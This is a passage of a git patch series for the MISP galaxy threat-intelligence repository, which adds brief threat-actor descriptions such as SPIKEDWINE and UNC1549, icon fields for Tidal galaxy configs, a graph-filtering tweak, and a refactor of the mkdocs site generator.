parseFilteredTable(tf, allData) { var data = []; tf.getFilteredData().forEach((row, i) => { @@ -427,6 +433,8 @@ document$.subscribe(function () { // Restart the simulation with new data simulation.nodes(nodes); simulation.force("link").links(links); + linkDistance = Math.sqrt((width * height) / nodes.length); + simulation.force("link").distance(linkDistance); simulation.alpha(1).restart(); } }); @@ -473,7 +481,13 @@ document$.subscribe(function () { }); tf.init(); - var data = parseTable(table); + var allData = parseTable(table); + if (allData.length > 1000) { + applyTableFilter(tf); + data = parseFilteredTable(tf, allData); + } else { + data = allData; + } var graphId = "graph" + index; var div = document.createElement("div"); div.id = graphId; @@ -482,7 +496,7 @@ document$.subscribe(function () { // Listen for table filtering events tf.emitter.on(['after-filtering'], function () { - filterTableAndGraph(tf, simulation, data); + filterTableAndGraph(tf, simulation, allData); }); } }); From b010a754267df68570875658bf5b41944f082b24 Mon Sep 17 00:00:00 2001 From: Mathieu4141 Date: Thu, 29 Feb 2024 10:38:27 -0800 Subject: [PATCH 22/49] [threat-actors] Add SPIKEDWINE --- clusters/threat-actor.json | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index bb14d1b..1274e6e 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -15269,6 +15269,16 @@ }, "uuid": "74268518-8dd9-4223-9f7f-54421463cdb3", "value": "GoldFactory" + }, + { + "description": "SPIKEDWINE is a threat actor targeting European officials with a new backdoor called WINELOADER. They use a bait PDF document posing as an invitation letter from the Ambassador of India to lure diplomats. The attack is characterized by advanced tactics, techniques, and procedures in the malware and command and control infrastructure. The motivation behind the attacks seems to be exploiting the geopolitical relations between India and European nations.", + "meta": { + "refs": [ + "https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader" + ] + }, + "uuid": "d3cda6b1-a5da-4afc-bee4-80ea2cf05e5e", + "value": "SPIKEDWINE" } ], "version": 302 From 7b3c8a87c30d53c5c383f46326af056a0b68407e Mon Sep 17 00:00:00 2001 From: Mathieu4141 Date: Thu, 29 Feb 2024 10:38:27 -0800 Subject: [PATCH 23/49] [threat-actors] Add UAC-0184 --- clusters/threat-actor.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 1274e6e..2ce319c 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -15279,6 +15279,17 @@ }, "uuid": "d3cda6b1-a5da-4afc-bee4-80ea2cf05e5e", "value": "SPIKEDWINE" + }, + { + "description": "UAC-0184 is a threat actor targeting Ukrainian organizations in Finland, using the Remcos Remote Access Trojan in their attacks. They have been observed utilizing steganographic image files and the IDAT Loader to deliver the malware. The group has targeted the Armed Forces of Ukraine and impersonated military recruitment processes to infect systems with the Remcos RAT.", + "meta": { + "refs": [ + "https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga", + "https://cert.gov.ua/article/6276988" + ] + }, + "uuid": "0e3224a0-3544-47d7-b1ce-fb3eb21286ad", + "value": "UAC-0184" } ], "version": 302 From cc68b22fe2b160d48b86e4ed5c9f4ff11da61954 Mon Sep 17 00:00:00 2001 From: Mathieu4141 Date: Thu, 29 Feb 2024 10:38:27 -0800 Subject: [PATCH 24/49] [threat-actors] Add UNC1549 --- clusters/threat-actor.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 2ce319c..af032c6 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -15290,6 +15290,17 @@ }, "uuid": "0e3224a0-3544-47d7-b1ce-fb3eb21286ad", "value": "UAC-0184" + }, + { + "description": "UNC1549 is an Iranian threat actor linked to Tortoiseshell and potentially the IRGC. They have been active since at least June 2022, targeting entities worldwide with a focus on the Middle East. UNC1549 uses spear-phishing and credential harvesting for initial access, deploying custom malware like MINIBIKE and MINIBUS backdoors. They have also been observed using evasion techniques and a tunneler named LIGHTRAIL in their operations.", + "meta": { + "country": "IR", + "refs": [ + "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east" + ] + }, + "uuid": "a2a7d49f-f517-4eeb-9ec8-b9b74e3fe756", + "value": "UNC1549" } ], "version": 302 From 39f89c900c361572cd434132e37bd248aff0056f Mon Sep 17 00:00:00 2001 From: Mathieu4141 Date: Thu, 29 Feb 2024 10:38:27 -0800 Subject: [PATCH 25/49] [threat-actors] Add Mogilevich --- clusters/threat-actor.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index af032c6..d6c47e0 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -15301,6 +15301,17 @@ }, "uuid": "a2a7d49f-f517-4eeb-9ec8-b9b74e3fe756", "value": "UNC1549" + }, + { + "description": "Mogilevich is a ransomware group known for claiming to breach organizations like Epic Games and Ireland's Department of Foreign Affairs, offering stolen data for sale without providing proof of the attacks. They operate as an extortion group, targeting high-profile victims and demanding payment for the data they claim to have stolen. Despite their claims, security researchers have noted that Mogilevich's tactics and website design suggest they may not be a sophisticated threat actor.", + "meta": { + "refs": [ + "https://therecord.media/ireland-dfa-no-evidence-of-cybersecurity-breach", + "https://www.bleepingcomputer.com/news/security/epic-games-zero-evidence-we-were-hacked-by-mogilevich-gang/" + ] + }, + "uuid": "95634994-9604-4fe6-9462-f472c2d82271", + "value": "Mogilevich" } ], "version": 302 From c11834aec420254d9dc1fcca8574a91631c9e1c7 Mon Sep 17 00:00:00 2001 From: Mathieu4141 Date: Thu, 29 Feb 2024 10:38:27 -0800 Subject: [PATCH 26/49] [threat-actors] Add R00tK1T --- clusters/threat-actor.json | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index d6c47e0..49dcfab 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -15312,6 +15312,18 @@ }, "uuid": "95634994-9604-4fe6-9462-f472c2d82271", "value": "Mogilevich" + }, + { + "description": "R00TK1T is a hacking group known for sophisticated cyber attacks targeting governmental agencies in Malaysia, including data exfiltration from the National Population and Family Development Board. The group has publicized their successful attacks on social media, showcasing stolen data. R00TK1T has also targeted Malaysian telecom providers, defacing portals and potentially breaching user data. ", + "meta": { + "country": "IL", + "refs": [ + "https://logrhythm.com/blog/how-government-agencies-can-defend-against-exfiltration-tactics/", + "https://cyble.com/blog/cyble-chronicles-february-1-latest-findings-recommendations-for-the-cybersecurity-community/" + ] + }, + "uuid": "69a944ef-4962-432e-a1b9-575b646ee2ed", + "value": "R00tK1T" } ], "version": 302 From 2301c156d9487ec2fdae93145c2f0ed56676500d Mon Sep 17 00:00:00 2001 From: niclas Date: Fri, 1 Mar 2024 10:31:05 +0100 Subject: [PATCH 27/49] Add [tidal] icons --- tools/tidal-api/config/campaigns.json | 3 ++- tools/tidal-api/config/groups.json | 3 ++- tools/tidal-api/config/references.json | 3 ++- tools/tidal-api/config/software.json | 3 ++- tools/tidal-api/config/tactic.json | 3 ++- tools/tidal-api/config/technique.json | 3 ++- tools/tidal-api/models/galaxy.py | 1 + 7 files changed, 13 insertions(+), 6 deletions(-) diff --git a/tools/tidal-api/config/campaigns.json b/tools/tidal-api/config/campaigns.json index 8463932..8d28b19 100644 --- a/tools/tidal-api/config/campaigns.json +++ b/tools/tidal-api/config/campaigns.json @@ -4,7 +4,8 @@ "namespace": "tidal", "description": "Tidal Campaigns Galaxy", "type": "campaigns", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48" + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "icon": "bullhorn" }, "cluster": { "authors": "Tidal", diff --git a/tools/tidal-api/config/groups.json b/tools/tidal-api/config/groups.json index 152b33c..8d89867 100644 --- a/tools/tidal-api/config/groups.json +++ b/tools/tidal-api/config/groups.json @@ -4,7 +4,8 @@ "namespace": "tidal", "description": "Tidal Groups Galaxy", "type": "groups", - "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6" + "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", + "icon": "user-secret" }, "cluster": { "authors": "Tidal", diff --git a/tools/tidal-api/config/references.json b/tools/tidal-api/config/references.json index 697861e..ad42ae4 100644 --- a/tools/tidal-api/config/references.json +++ b/tools/tidal-api/config/references.json @@ -4,7 +4,8 @@ "namespace": "tidal", "description": "Tidal References Galaxy", "type": "references", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48" + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "icon": "list" }, "cluster": { "authors": "Tidal", diff --git a/tools/tidal-api/config/software.json b/tools/tidal-api/config/software.json index 58bd485..328bc32 100644 --- a/tools/tidal-api/config/software.json +++ b/tools/tidal-api/config/software.json @@ -4,7 +4,8 @@ "namespace": "tidal", "description": "Tidal Software Galaxy", "type": "software", - "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7" + "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", + "icon": "file-code" }, "cluster": { "authors": "Tidal", diff --git a/tools/tidal-api/config/tactic.json b/tools/tidal-api/config/tactic.json index 31d592c..0027c39 100644 --- a/tools/tidal-api/config/tactic.json +++ b/tools/tidal-api/config/tactic.json @@ -4,7 +4,8 @@ "namespace": "tidal", "description": "Tidal Tactic Galaxy", "type": "tactic", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48" + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "icon": "map" }, "cluster": { "authors": "Tidal", diff --git a/tools/tidal-api/config/technique.json b/tools/tidal-api/config/technique.json index 4f72c96..674c656 100644 --- a/tools/tidal-api/config/technique.json +++ b/tools/tidal-api/config/technique.json @@ -4,7 +4,8 @@ "namespace": "tidal", "description": "Tidal Technique Galaxy", "type": "technique", - "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48" + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "icon": "user-ninja" }, "cluster": { "authors": "Tidal", diff --git a/tools/tidal-api/models/galaxy.py b/tools/tidal-api/models/galaxy.py index 9b091e4..1946a4b 100644 --- a/tools/tidal-api/models/galaxy.py +++ b/tools/tidal-api/models/galaxy.py @@ -4,6 +4,7 @@ from dataclasses import dataclass, asdict @dataclass class Galaxy(): description: str + icon: str name: str namespace: str type: str From 0f3ad79069c74128a204d455ffdc72a97eecc768 Mon Sep 17 00:00:00 2001 From: niclas Date: Fri, 1 Mar 2024 16:30:49 +0100 Subject: [PATCH 28/49] update --- tools/mkdocs/main.py | 154 +++++++++++++++++ tools/mkdocs/modules/cluster.py | 277 ++++++++----------------------- tools/mkdocs/modules/galaxy.py | 104 ++++++------ tools/mkdocs/modules/universe.py | 168 +++++++++++++++++++ 4 files changed, 441 insertions(+), 262 deletions(-) create mode 100644 tools/mkdocs/main.py create mode 100644 tools/mkdocs/modules/universe.py diff --git a/tools/mkdocs/main.py b/tools/mkdocs/main.py new file mode 100644 index 0000000..0697ef3 --- /dev/null +++ b/tools/mkdocs/main.py @@ -0,0 +1,154 @@ +from modules.universe import Universe + +import multiprocessing +from multiprocessing import Pool + +import json +import os +import time +import sys + +sys.setrecursionlimit(10000) + +FILES_TO_IGNORE = [] +CLUSTER_PATH = "../../clusters" +SITE_PATH = "./site/docs" +GALAXY_PATH = "../../galaxies" + +def save_cluster_relationships(cluster_data): + # Unpack cluster data + galaxy_name, cluster_name, cluster = cluster_data + + # Assuming `universe.get_relationships_with_levels` and `cluster.save_relationships` + # are methods that can be called like this. + relationships = universe.get_relationships_with_levels(cluster) + cluster.save_relationships(relationships) + print(f"Processed {galaxy_name}, {cluster_name}") + +def get_deprecated_galaxy_files(): + deprecated_galaxy_files = [] + for f in os.listdir(GALAXY_PATH): + with open(os.path.join(GALAXY_PATH, f)) as fr: + galaxy_json = json.load(fr) + if "namespace" in galaxy_json and galaxy_json["namespace"] == "deprecated": + deprecated_galaxy_files.append(f) + + return deprecated_galaxy_files + +def cluster_transform_to_link(cluster): + placeholder = "__TMP__" + section = ( + cluster + .value.lower() + .replace(" - ", placeholder) # Replace " - " first + .replace(" ", "-") + .replace("/", "") + .replace(":", "") + .replace(placeholder, "-") + ) + return f"[{cluster.value} ({cluster.uuid})](../../{cluster.galaxy.json_file_name}/index.md#{section})" + +def galaxy_transform_to_link(galaxy): + return f"[{galaxy.galaxy_name}](../../{galaxy.json_file_name}/index.md)" + +def generate_relations_table(relationships): + markdown = "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" + markdown += "|--- | --- | --- | --- | --- | ---|\n" + for from_cluster, to_cluster, level in relationships: + from_galaxy = from_cluster.galaxy.galaxy_name + to_galaxy = to_cluster.galaxy.galaxy_name + markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" + return markdown + +def generate_index_page(galaxies): + index_output = "# MISP Galaxy\n\nThe MISP galaxy offers a streamlined approach for representing large entities, known as clusters, which can be linked to MISP events or attributes. Each cluster consists of one or more elements, represented as key-value pairs. MISP galaxy comes with a default knowledge base, encompassing areas like Threat Actors, Tools, Ransomware, and ATT&CK matrices. However, users have the flexibility to modify, update, replace, or share these elements according to their needs.\n\nClusters and vocabularies within MISP galaxy can be utilized in their original form or as a foundational knowledge base. The distribution settings for each cluster can be adjusted, allowing for either restricted or wide dissemination.\n\nAdditionally, MISP galaxies enable the representation of existing standards like the MITRE ATT&CK™ framework, as well as custom matrices.\n\nThe aim is to provide a core set of clusters for organizations embarking on analysis, which can be further tailored to include localized, private information or additional, shareable data.\n\nClusters serve as an open and freely accessible knowledge base, which can be utilized and expanded within [MISP](https://www.misp-project.org/) or other threat intelligence platforms.\n\n![Overview of the integration of MISP galaxy in the MISP Threat Intelligence Sharing Platform](https://raw.githubusercontent.com/MISP/misp-galaxy/aa41337fd78946a60aef3783f58f337d2342430a/doc/images/galaxy.png)\n\n## Publicly available clusters\n" + for galaxy in galaxies: + index_output += f"- [{galaxy.galaxy_name}](./{galaxy.json_file_name}/index.md)\n" + index_output += "## Statistics\n\nYou can find some statistics about MISP galaxies [here](./statistics.md).\n" + index_output += "# Contributing\n\nIn the dynamic realm of threat intelligence, a variety of models and approaches exist to systematically organize, categorize, and delineate threat actors, hazards, or activity groups. We embrace innovative methodologies for articulating threat intelligence. The galaxy model is particularly versatile, enabling you to leverage and integrate methodologies that you trust and are already utilizing within your organization or community.\n\nWe encourage collaboration and contributions to the [MISP Galaxy JSON files](https://github.com/MISP/misp-galaxy/). Feel free to fork the project, enhance existing elements or clusters, or introduce new ones. Your insights are valuable - share them with us through a pull-request.\n" + return index_output + +if __name__ == "__main__": + start_time = time.time() + universe = Universe() + + FILES_TO_IGNORE.extend(get_deprecated_galaxy_files()) + galaxies_fnames = [] + for f in os.listdir(CLUSTER_PATH): + if ".json" in f and f not in FILES_TO_IGNORE: + galaxies_fnames.append(f) + galaxies_fnames.sort() + + # Create the universe of clusters and galaxies + for galaxy in galaxies_fnames: + with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: + galaxy_json = json.load(fr) + universe.add_galaxy(galaxy_name=galaxy_json["name"], json_file_name=galaxy, authors=galaxy_json["authors"], description=galaxy_json["description"]) + for cluster in galaxy_json["values"]: + universe.add_cluster( + galaxy_name=galaxy_json.get("name", None), + uuid=cluster.get("uuid", None), + description=cluster.get("description", None), + value=cluster.get("value", None), + meta=cluster.get("meta", None) + ) + + + # Define the relationships between clusters + for galaxy in galaxies_fnames: + with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: + galaxy_json = json.load(fr) + for cluster in galaxy_json["values"]: + if "related" in cluster: + for related in cluster["related"]: + universe.define_relationship(cluster["uuid"], related["dest-uuid"]) + + + # # Save relationships to clusters + # for galaxy in universe.galaxies.values(): + # for cluster in galaxy.clusters.values(): + # cluster.save_relationships(universe.get_relationships_with_levels(cluster)) + + tasks = [] + for galaxy_name, galaxy in universe.galaxies.items(): + for cluster_name, cluster in galaxy.clusters.items(): + tasks.append((galaxy_name, cluster_name, cluster)) + + with Pool(processes=multiprocessing.cpu_count()) as pool: + pool.map(save_cluster_relationships, tasks) + print("All clusters processed.") + + print(f"Finished relations in {time.time() - start_time} seconds") + + # Write output + if not os.path.exists(SITE_PATH): + os.mkdir(SITE_PATH) + + with open(os.path.join(SITE_PATH, "index.md"), "w") as index: + index.write(generate_index_page(universe.galaxies.values())) + + for galaxy in universe.galaxies.values(): + galaxy.write_entry(SITE_PATH) + + for galaxy in universe.galaxies.values(): + if not os.path.exists(GALAXY_PATH): + os.mkdir(GALAXY_PATH) + relation_path = os.path.join(GALAXY_PATH, "relations") + if not os.path.exists(relation_path): + os.mkdir(relation_path) + with open(os.path.join(relation_path, ".pages"), "w") as index: + index.write(f"hide: true\n") + + for cluster in galaxy.clusters.values(): + if cluster.relationships: + with open(os.path.join(relation_path, f"{cluster.uuid}.md"), "w") as index: + index.write(generate_relations_table(cluster.relationships)) + + print(f"Finished in {time.time() - start_time} seconds") + + # relationships = universe.get_relationships_with_levels("Banker", "f0ec2df5-2e38-4df3-970d-525352006f2e") + # print(relationships) + + + # markdown_table = generate_markdown_table(relationships) + # print(markdown_table) \ No newline at end of file diff --git a/tools/mkdocs/modules/cluster.py b/tools/mkdocs/modules/cluster.py index 6229c93..7919679 100644 --- a/tools/mkdocs/modules/cluster.py +++ b/tools/mkdocs/modules/cluster.py @@ -1,246 +1,109 @@ -import os import validators - class Cluster: - def __init__( - self, description, uuid, date, value, related_list, meta, galaxy - ): - self.description = description + def __init__(self, uuid, galaxy, description=None, value=None, meta=None): self.uuid = uuid - self.date = date + self.description = description self.value = value - self.related_list = related_list self.meta = meta - self.galaxy = galaxy - self.entry = "" - self.statistics = None + self.galaxy = galaxy # Reference to the Galaxy object this cluster belongs to + self.outbound_relationships = set() + self.inbound_relationships = set() + self.relationships = set() - def __lt__(self, other): - return self.uuid < other.uuid + def add_outbound_relationship(self, cluster): + self.outbound_relationships.add(cluster) - def set_statistics(self, statistics): - self.statistics = statistics + def add_inbound_relationship(self, cluster): + self.inbound_relationships.add(cluster) + def save_relationships(self, relationships): + self.relationships = relationships + + def generate_entry(self): + entry = "" + entry += self._create_title_entry() + entry += self._create_description_entry() + entry += self._create_synonyms_entry() + entry += self._create_uuid_entry() + entry += self._create_refs_entry() + entry += self._create_associated_metadata_entry() + if self.relationships: + entry += self._create_related_entry() + return entry + def _create_title_entry(self): - self.entry += f"## {self.value}\n" - self.entry += f"\n" + entry = "" + entry += f"## {self.value}\n" + entry += f"\n" + return entry def _create_description_entry(self): + entry = "" if self.description: - self.entry += f"{self.description}\n" + entry += f"{self.description}\n" + return entry def _create_synonyms_entry(self): + entry = "" if isinstance(self.meta, dict) and self.meta.get("synonyms"): - self.entry += f"\n" - self.entry += f'??? info "Synonyms"\n' - self.entry += f"\n" - self.entry += f' "synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular {self.value}.\n\n' - self.entry += f" | Known Synonyms |\n" - self.entry += f" |---------------------|\n" + entry += f"\n" + entry += f'??? info "Synonyms"\n' + entry += f"\n" + entry += f' "synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular {self.value}.\n\n' + entry += f" | Known Synonyms |\n" + entry += f" |---------------------|\n" synonyms_count = 0 for synonym in sorted(self.meta["synonyms"]): synonyms_count += 1 - self.entry += f" | `{synonym}` |\n" - self.statistics.synonyms_count_dict[self.uuid] = synonyms_count + entry += f" | `{synonym}` |\n" + return entry def _create_uuid_entry(self): + entry = "" if self.uuid: - self.entry += f"\n" - self.entry += f'??? tip "Internal MISP references"\n' - self.entry += f"\n" - self.entry += f" UUID `{self.uuid}` which can be used as unique global reference for `{self.value}` in MISP communities and other software using the MISP galaxy\n" - self.entry += f"\n" + entry += f"\n" + entry += f'??? tip "Internal MISP references"\n' + entry += f"\n" + entry += f" UUID `{self.uuid}` which can be used as unique global reference for `{self.value}` in MISP communities and other software using the MISP galaxy\n" + entry += f"\n" + return entry def _create_refs_entry(self): + entry = "" if isinstance(self.meta, dict) and self.meta.get("refs"): - self.entry += f"\n" - self.entry += f'??? info "External references"\n' - self.entry += f"\n" + entry += f"\n" + entry += f'??? info "External references"\n' + entry += f"\n" for ref in self.meta["refs"]: if validators.url(ref): - self.entry += f" - [{ref}]({ref}) - :material-archive: :material-arrow-right: [webarchive](https://web.archive.org/web/*/{ref})\n" + entry += f" - [{ref}]({ref}) - :material-archive: :material-arrow-right: [webarchive](https://web.archive.org/web/*/{ref})\n" else: - self.entry += f" - {ref}\n" + entry += f" - {ref}\n" - self.entry += f"\n" + entry += f"\n" + return entry def _create_associated_metadata_entry(self): + entry = "" if isinstance(self.meta, dict): excluded_meta = ["synonyms", "refs"] - self.entry += f"\n" - self.entry += f'??? info "Associated metadata"\n' - self.entry += f"\n" - self.entry += f" |Metadata key {{ .no-filter }} |Value|\n" - self.entry += f" |-----------------------------------|-----|\n" + entry += f"\n" + entry += f'??? info "Associated metadata"\n' + entry += f"\n" + entry += f" |Metadata key {{ .no-filter }} |Value|\n" + entry += f" |-----------------------------------|-----|\n" for meta in sorted(self.meta.keys()): if meta not in excluded_meta: - self.entry += f" | {meta} | {self.meta[meta]} |\n" - - def get_related_clusters( - self, cluster_dict, depth=-1, visited=None, level=1, related_private_clusters={} - ): - empty_uuids = 0 - - if visited is None: - visited = {} - - related_clusters = [] - if depth == 0 or not self.related_list: - return related_clusters - - if self.uuid in visited and visited[self.uuid] <= level: - return related_clusters - else: - visited[self.uuid] = level - - for cluster in self.related_list: - dest_uuid = cluster["dest-uuid"] - - # Cluster is private - if dest_uuid not in cluster_dict: - # Check if UUID is empty - if not dest_uuid: - empty_uuids += 1 - continue - self.statistics.private_relations_count += 1 - if dest_uuid not in self.statistics.private_clusters: - self.statistics.private_clusters.append(dest_uuid) - if dest_uuid in related_private_clusters: - related_clusters.append( - ( - self, - related_private_clusters[dest_uuid], - level, - ) - ) - else: - related_clusters.append( - ( - self, - Cluster( - value="Private Cluster", - uuid=dest_uuid, - date=None, - description=None, - related_list=None, - meta=None, - galaxy=None, - ), - level, - ) - ) - related_private_clusters[dest_uuid] = related_clusters[-1][1] - continue - - related_cluster = cluster_dict[dest_uuid] - - self.statistics.public_relations_count += 1 - - related_clusters.append((self, related_cluster, level)) - - if (depth > 1 or depth == -1) and ( - cluster["dest-uuid"] not in visited - or visited[cluster["dest-uuid"]] > level + 1 - ): - new_depth = depth - 1 if depth > 1 else -1 - if cluster["dest-uuid"] in cluster_dict: - related_clusters += cluster_dict[ - cluster["dest-uuid"] - ].get_related_clusters( - cluster_dict, - new_depth, - visited, - level + 1, - related_private_clusters, - ) - - if empty_uuids > 0: - self.statistics.empty_uuids_dict[self.value] = empty_uuids - - return self._remove_duplicates(related_clusters) - - def _remove_duplicates(self, related_clusters): - cluster_dict = {} - for cluster in related_clusters: - key = tuple(sorted((cluster[0], cluster[1]))) - - if key in cluster_dict: - if cluster_dict[key][2] > cluster[2]: - cluster_dict[key] = cluster - else: - cluster_dict[key] = cluster - related_clusters = list(cluster_dict.values()) - - return related_clusters + entry += f" | {meta} | {self.meta[meta]} |\n" + return entry def _create_related_entry(self): - self.entry += f"\n" - self.entry += f'??? info "Related clusters"\n' - self.entry += f"\n" - self.entry += f" To see the related clusters, click [here](./relations/{self.uuid}.md).\n" - - def _get_related_entry(self, relations): - output = "" - output += f"## Related clusters for {self.value}\n" - output += f"\n" - output += f"| Cluster A | Galaxy A | Cluster B | Galaxy B | Level {{ .graph }} |\n" - output += f"|-----------|----------|-----------|----------|-------------------|\n" - for relation in relations: - placeholder = "__TMP__" - - cluster_a_section = ( - relation[0] - .value.lower() - .replace(" - ", placeholder) # Replace " - " first - .replace(" ", "-") - .replace("/", "") - .replace(":", "") - .replace(placeholder, "-") - ) # Replace the placeholder with "-" - - cluster_b_section = ( - relation[1] - .value.lower() - .replace(" - ", placeholder) # Replace " - " first - .replace(" ", "-") - .replace("/", "") - .replace(":", "") - .replace(placeholder, "-") - ) # Replace the placeholder with "-" - - if cluster_b_section != "private-cluster": - output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxy.json_file_name}/index.md#{cluster_a_section}) | [{relation[0].galaxy.name}](../../{relation[0].galaxy.json_file_name}/index.md) | [{relation[1].value} ({relation[1].uuid})](../../{relation[1].galaxy.json_file_name}/index.md#{cluster_b_section}) | [{relation[1].galaxy.name}](../../{relation[1].galaxy.json_file_name}/index.md) | {relation[2]} |\n" - else: - output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxy.json_file_name}/index.md#{cluster_a_section}) | [{relation[0].galaxy.name}](../../{relation[0].galaxy.json_file_name}/index.md) |{relation[1].value} ({relation[1].uuid}) | unknown | {relation[2]} |\n" - return output - - def create_entry(self, cluster_dict, path): - if not self.statistics: - raise ValueError("Statistics not set") - self._create_title_entry() - self._create_description_entry() - self._create_synonyms_entry() - self._create_uuid_entry() - self._create_refs_entry() - self._create_associated_metadata_entry() - if self.related_list: - self._create_related_entry() - self._write_relations(cluster_dict, path) - return self.entry - - def _write_relations(self, cluster_dict, path): - related_clusters = self.get_related_clusters(cluster_dict) - self.statistics.relation_count_dict[self.uuid] = len(related_clusters) - galaxy_path = os.path.join(path, self.galaxy.json_file_name) - if not os.path.exists(galaxy_path): - os.mkdir(galaxy_path) - relation_path = os.path.join(galaxy_path, "relations") - if not os.path.exists(relation_path): - os.mkdir(relation_path) - with open(os.path.join(relation_path, ".pages"), "w") as index: - index.write(f"hide: true\n") - with open(os.path.join(relation_path, f"{self.uuid}.md"), "w") as index: - index.write(self._get_related_entry(related_clusters)) + entry = "" + entry += f"\n" + entry += f'??? info "Related clusters"\n' + entry += f"\n" + entry += f" To see the related clusters, click [here](./relations/{self.uuid}.md).\n" + return entry \ No newline at end of file diff --git a/tools/mkdocs/modules/galaxy.py b/tools/mkdocs/modules/galaxy.py index f45a6d0..7fd5785 100644 --- a/tools/mkdocs/modules/galaxy.py +++ b/tools/mkdocs/modules/galaxy.py @@ -3,72 +3,66 @@ from typing import List import os class Galaxy: - def __init__( - self, cluster_list: List[dict], authors, description, name, json_file_name - ): - self.cluster_list = cluster_list + def __init__(self, galaxy_name: str, json_file_name: str, authors: List[str], description: str): + self.galaxy_name = galaxy_name + self.json_file_name = json_file_name self.authors = authors self.description = description - self.name = name - self.json_file_name = json_file_name - self.clusters = self._create_clusters() - self.entry = "" + self.clusters = {} # Maps uuid to Cluster objects + + def add_cluster(self, uuid, description, value, meta): + if uuid not in self.clusters: + self.clusters[uuid] = Cluster(uuid=uuid, galaxy=self, description=description, value=value, meta=meta) + + def write_entry(self, path): + if not os.path.exists(path): + os.mkdir(path) + with open(os.path.join(path, f"{self.galaxy_name}.md"), "w") as index: + index.write(self.generate_entry()) + + def generate_entry(self): + entry = "" + entry += self._create_metadata_entry() + entry += self._create_title_entry() + entry += self._create_description_entry() + entry += self._create_authors_entry() + entry += self._create_clusters_entry() + return entry + def _create_metadata_entry(self): - self.entry += "---\n" - self.entry += f"title: {self.name}\n" + entry = "" + entry += "---\n" + entry += f"title: {self.galaxy_name}\n" meta_description = self.description.replace('"', "-") - self.entry += f"description: {meta_description}\n" - self.entry += "---\n" + entry += f"description: {meta_description}\n" + entry += "---\n" + return entry def _create_title_entry(self): - self.entry += f"# {self.name}\n" + entry = "" + entry += f"# {self.galaxy_name}\n" + return entry def _create_description_entry(self): - self.entry += f"{self.description}\n" + entry = "" + entry += f"{self.description}\n" + return entry def _create_authors_entry(self): + entry = "" if self.authors: - self.entry += f"\n" - self.entry += f'??? info "Authors"\n' - self.entry += f"\n" - self.entry += f" | Authors and/or Contributors|\n" - self.entry += f" |----------------------------|\n" + entry += f"\n" + entry += f'??? info "Authors"\n' + entry += f"\n" + entry += f" | Authors and/or Contributors|\n" + entry += f" |----------------------------|\n" for author in self.authors: - self.entry += f" |{author}|\n" + entry += f" |{author}|\n" + return entry - def _create_clusters(self): - clusters = [] - for cluster in self.cluster_list: - clusters.append( - Cluster( - value=cluster.get("value", None), - description=cluster.get("description", None), - uuid=cluster.get("uuid", None), - date=cluster.get("date", None), - related_list=cluster.get("related", None), - meta=cluster.get("meta", None), - galaxy=self, - ) - ) - return clusters - - def _create_clusters_entry(self, cluster_dict, path): - for cluster in self.clusters: - self.entry += cluster.create_entry(cluster_dict, path) - - def create_entry(self, cluster_dict, path): - self._create_metadata_entry() - self._create_title_entry() - self._create_description_entry() - self._create_authors_entry() - self._create_clusters_entry(cluster_dict, path) - return self.entry - - def write_entry(self, path, cluster_dict): - self.create_entry(cluster_dict, path) - galaxy_path = os.path.join(path, self.json_file_name) - if not os.path.exists(galaxy_path): - os.mkdir(galaxy_path) - with open(os.path.join(galaxy_path, "index.md"), "w") as index: - index.write(self.entry) \ No newline at end of file + def _create_clusters_entry(self): + entry = "" + for cluster in self.clusters.values(): + entry += cluster.generate_entry() + return entry \ No newline at end of file diff --git a/tools/mkdocs/modules/universe.py b/tools/mkdocs/modules/universe.py new file mode 100644 index 0000000..f443629 --- /dev/null +++ b/tools/mkdocs/modules/universe.py @@ -0,0 +1,168 @@ +from modules.galaxy import Galaxy +from modules.cluster import Cluster + +from collections import defaultdict, deque + + +class Universe: + def __init__(self): + self.galaxies = {} # Maps galaxy_name to Galaxy objects + + def add_galaxy(self, galaxy_name, json_file_name, authors, description): + if galaxy_name not in self.galaxies: + self.galaxies[galaxy_name] = Galaxy(galaxy_name=galaxy_name, json_file_name=json_file_name, authors=authors, description=description) + + def add_cluster(self, galaxy_name, uuid, description, value, meta): + if galaxy_name in self.galaxies: + 